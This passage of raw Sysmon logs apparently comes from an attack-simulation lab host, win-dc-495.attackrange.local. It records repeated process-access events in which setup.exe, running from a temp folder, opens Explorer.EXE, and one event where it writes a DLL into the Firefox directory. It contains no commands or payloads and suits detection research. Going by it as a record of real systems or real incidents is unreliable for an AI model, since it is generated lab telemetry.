ll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\AccessibleHandler.dll2021-01-18 13:59:52.083 10341000x800000000000000014100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 